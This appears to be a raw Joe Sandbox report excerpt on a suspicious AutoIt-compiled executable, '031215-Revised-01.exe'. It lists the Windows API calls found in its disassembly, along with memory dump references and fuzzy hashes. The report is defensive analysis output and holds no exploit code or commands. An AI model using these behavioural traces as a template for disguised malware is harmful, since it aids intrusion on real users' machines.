                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @
                                        • API String ID: 4150878124-2766056989
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\031215-Revised-01.exe,00000104), ref: 000A1769
                                        • _free.LIBCMT ref: 000A1834
                                        • _free.LIBCMT ref: 000A183E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\031215-Revised-01.exe
                                        • API String ID: 2506810119-2470277103
                                        APIs
                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 000DC306
                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 000DC34C
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00141990,014257A8), ref: 000DC395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem
                                        • String ID: 0
                                        • API String ID: 135850232-4108050209
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0010CC08,00000000,?,?,?,?), ref: 001044AA
                                        • GetWindowLongW.USER32 ref: 001044C7
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001044D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        APIs
                                        • SysReAllocString.OLEAUT32(?,?), ref: 000D6EED
                                        • VariantCopyInd.OLEAUT32(?,?), ref: 000D6F08
                                        • VariantClear.OLEAUT32(?), ref: 000D6F12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$AllocClearCopyString
                                        • String ID: *j
                                        • API String ID: 2173805711-725149108
                                        APIs
                                          • Part of subcall function 000F335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,000F3077,?,?), ref: 000F3378
                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000F307A
                                        • _wcslen.LIBCMT ref: 000F309B
                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 000F3106
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 946324512-2422070025
                                        APIs
                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00104705
                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00104713
                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0010471A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyWindow
                                        • String ID: msctls_updown32
                                        • API String ID: 4014797782-2298589950
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 176396367-2734436370
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00103840
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00103850
                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00103876
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000E4A08
                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000E4A5C
                                        • SetErrorMode.KERNEL32(00000000,?,?,0010CC08), ref: 000E4AD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume
                                        • String ID: %lu
                                        • API String ID: 2507767853-685833217
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0010424F
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00104264
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00104271
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        APIs
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                          • Part of subcall function 000D2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000D2DC5
                                          • Part of subcall function 000D2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 000D2DD6
                                          • Part of subcall function 000D2DA7: GetCurrentThreadId.KERNEL32 ref: 000D2DDD
                                          • Part of subcall function 000D2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 000D2DE4
                                        • GetFocus.USER32 ref: 000D2F78
                                          • Part of subcall function 000D2DEE: GetParent.USER32(00000000), ref: 000D2DF9
                                        • GetClassNameW.USER32(?,?,00000100), ref: 000D2FC3
                                        • EnumChildWindows.USER32(?,000D303B), ref: 000D2FEB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                        • String ID: %s%d
                                        • API String ID: 1272988791-1110647743
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001058C1
                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001058EE
                                        • DrawMenuBar.USER32(?), ref: 001058FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$InfoItem$Draw
                                        • String ID: 0
                                        • API String ID: 3227129158-4108050209
                                        • Opcode ID: 86d29667a8e9037e2f801a9e594b488e69e8126965210b88e5ceaf4d323d4602
                                        • Instruction ID: fea2b465b4823b83369e57c0c1b382f9068f34855f773a08b0926e3f15af0562
                                        • Opcode Fuzzy Hash: 86d29667a8e9037e2f801a9e594b488e69e8126965210b88e5ceaf4d323d4602
                                        • Instruction Fuzzy Hash: EB016D35600218EFDB219F21DC44BEFBBB5FB45365F108099F889D6191DBB08A94DF61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 88a8dc5c1d9532712493f9a0ba64c3877d30c387c54414d9db53ea57e6d26ac5
                                        • Instruction ID: 7582ba3bc3de17d4d2e3793be942df2c405d16fbd1e488633146b006fea5c2bf
                                        • Opcode Fuzzy Hash: 88a8dc5c1d9532712493f9a0ba64c3877d30c387c54414d9db53ea57e6d26ac5
                                        • Instruction Fuzzy Hash: 2BC11975A00216EFDB14CFA4C898BAEB7B9FF48704F108599E509EB251D771EE41CBA0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInitInitializeUninitialize
                                        • String ID:
                                        • API String ID: 1998397398-0
                                        • Opcode ID: 3e50f875b11320e29030741362d17bd4d49faab91ee673b698871d8bc852dc96
                                        • Instruction ID: c26c1c572f3e22a47e682b6cc4b83da5eb0b7b3d8e093824882d1d3b09c96a61
                                        • Opcode Fuzzy Hash: 3e50f875b11320e29030741362d17bd4d49faab91ee673b698871d8bc852dc96
                                        • Instruction Fuzzy Hash: 2AA189756047049FC710EF28C485A6AB7E4FF88724F14885DFA8A9B362DB74EE00CB95
                                        APIs
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0010FC08,?), ref: 000D05F0
                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0010FC08,?), ref: 000D0608
                                        • CLSIDFromProgID.OLE32(?,?,00000000,0010CC40,000000FF,?,00000000,00000800,00000000,?,0010FC08,?), ref: 000D062D
                                        • _memcmp.LIBVCRUNTIME ref: 000D064E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FromProg$FreeTask_memcmp
                                        • String ID:
                                        • API String ID: 314563124-0
                                        • Opcode ID: 7de53ac5f90c94167d6e762e57f13e9fe58b1ab72585dd551eb91b00e9ce77c8
                                        • Instruction ID: bbb40cec883fe512f1b2268d464f5460c52196619947500f6c2beb55d6900803
                                        • Opcode Fuzzy Hash: 7de53ac5f90c94167d6e762e57f13e9fe58b1ab72585dd551eb91b00e9ce77c8
                                        • Instruction Fuzzy Hash: 7181FC75A00209EFCB04DF94C984EEEB7B9FF89315F208559E506AB250DB71AE46CF60
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 8e7ccf4ed4f2c58a9bdf6e851ee6cf586e05a0e61a3c4ddfde581e1a7c91f275
                                        • Instruction ID: ee386dd587fcdf4f617b64714f22ed13c8e3d1edb1f8350d581f122afeab1f5b
                                        • Opcode Fuzzy Hash: 8e7ccf4ed4f2c58a9bdf6e851ee6cf586e05a0e61a3c4ddfde581e1a7c91f275
                                        • Instruction Fuzzy Hash: 84416731A00501ABDF317BFD8C56BFE3AE4EF46770F644225F418D6293EB348941A2A2
                                        APIs
                                        • GetWindowRect.USER32(0142E8C0,?), ref: 001062E2
                                        • ScreenToClient.USER32(?,?), ref: 00106315
                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00106382
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID:
                                        • API String ID: 3880355969-0
                                        • Opcode ID: 039addb50de65f0c2634d11f76b80dffcb5b70743694dd957573cae0fc0b2808
                                        • Instruction ID: 99c6a8910f73a7ed03fdfa567427be359cbabb98b8e6c3115a58df69be02763d
                                        • Opcode Fuzzy Hash: 039addb50de65f0c2634d11f76b80dffcb5b70743694dd957573cae0fc0b2808
                                        • Instruction Fuzzy Hash: 3C510D74A00209EFDB20DF54D881AAE7BB5FB55364F108259F8999B2E0D770ED91CB90
                                        APIs
                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 000F1AFD
                                        • WSAGetLastError.WSOCK32 ref: 000F1B0B
                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 000F1B8A
                                        • WSAGetLastError.WSOCK32 ref: 000F1B94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$socket
                                        • String ID:
                                        • API String ID: 1881357543-0
                                        • Opcode ID: a5de9939c6b0e30e9f1914f904fda85a91e8ae4d1d805e06f41762a912774a6f
                                        • Instruction ID: 9a9b00d50fd279e7cc73a60ce0fb9065c52c3e36610b98f4644a7808fa0fcb74
                                        • Opcode Fuzzy Hash: a5de9939c6b0e30e9f1914f904fda85a91e8ae4d1d805e06f41762a912774a6f
                                        • Instruction Fuzzy Hash: F541D174640200AFE720AF20C886FB977E5AB44718F54C458FA5A9F7D3D776ED418B90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 46f177bbe04e1e654ea012ef484c1ae8695d84323723f740dcdb671af9500dda
                                        • Instruction ID: f319a637bf79fea15ea50289d0d3d8a757085f677c013d8ab2c8df453be8c50b
                                        • Opcode Fuzzy Hash: 46f177bbe04e1e654ea012ef484c1ae8695d84323723f740dcdb671af9500dda
                                        • Instruction Fuzzy Hash: 1041D371A00704AFD7249FB8CC41BEEBBE9EF89710F10452AF551DB283D771A9418790
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000E5783
                                        • GetLastError.KERNEL32(?,00000000), ref: 000E57A9
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000E57CE
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000E57FA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: c7b0c18ad1aecd587035997ca1a9a1d63d4fb3fe2d26166b3c81a72b32fdc1c2
                                        • Instruction ID: aee0ae89e1233cb833a2dfa550370a9ddb15f36658ca6616e1ec72509824eb72
                                        • Opcode Fuzzy Hash: c7b0c18ad1aecd587035997ca1a9a1d63d4fb3fe2d26166b3c81a72b32fdc1c2
                                        • Instruction Fuzzy Hash: C2412C39600A14DFCB11EF15C544A5DBBE2AF89725B18C888E84E6B362CB74FD41CB95
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00096D71,00000000,00000000,000982D9,?,000982D9,?,00000001,00096D71,?,00000001,000982D9,000982D9), ref: 000AD910
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000AD999
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 000AD9AB
                                        • __freea.LIBCMT ref: 000AD9B4
                                          • Part of subcall function 000A3820: RtlAllocateHeap.NTDLL(00000000,?,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6,?,00071129), ref: 000A3852
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 82fdf08318834bc81c9b598698981023663cb356fd2d5c6130e2f5afe3d925cc
                                        • Instruction ID: 637d377c2410861dd16436333b5d7808d035143aa3d2f99d8a7fcddcb2913d65
                                        • Opcode Fuzzy Hash: 82fdf08318834bc81c9b598698981023663cb356fd2d5c6130e2f5afe3d925cc
                                        • Instruction Fuzzy Hash: C031BE72A1020AABDF259FA4DC45EEF7BA9EB42310F05426AFC05DB251EB35CD54CB90
                                        APIs
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00105352
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00105375
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00105382
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001053A8
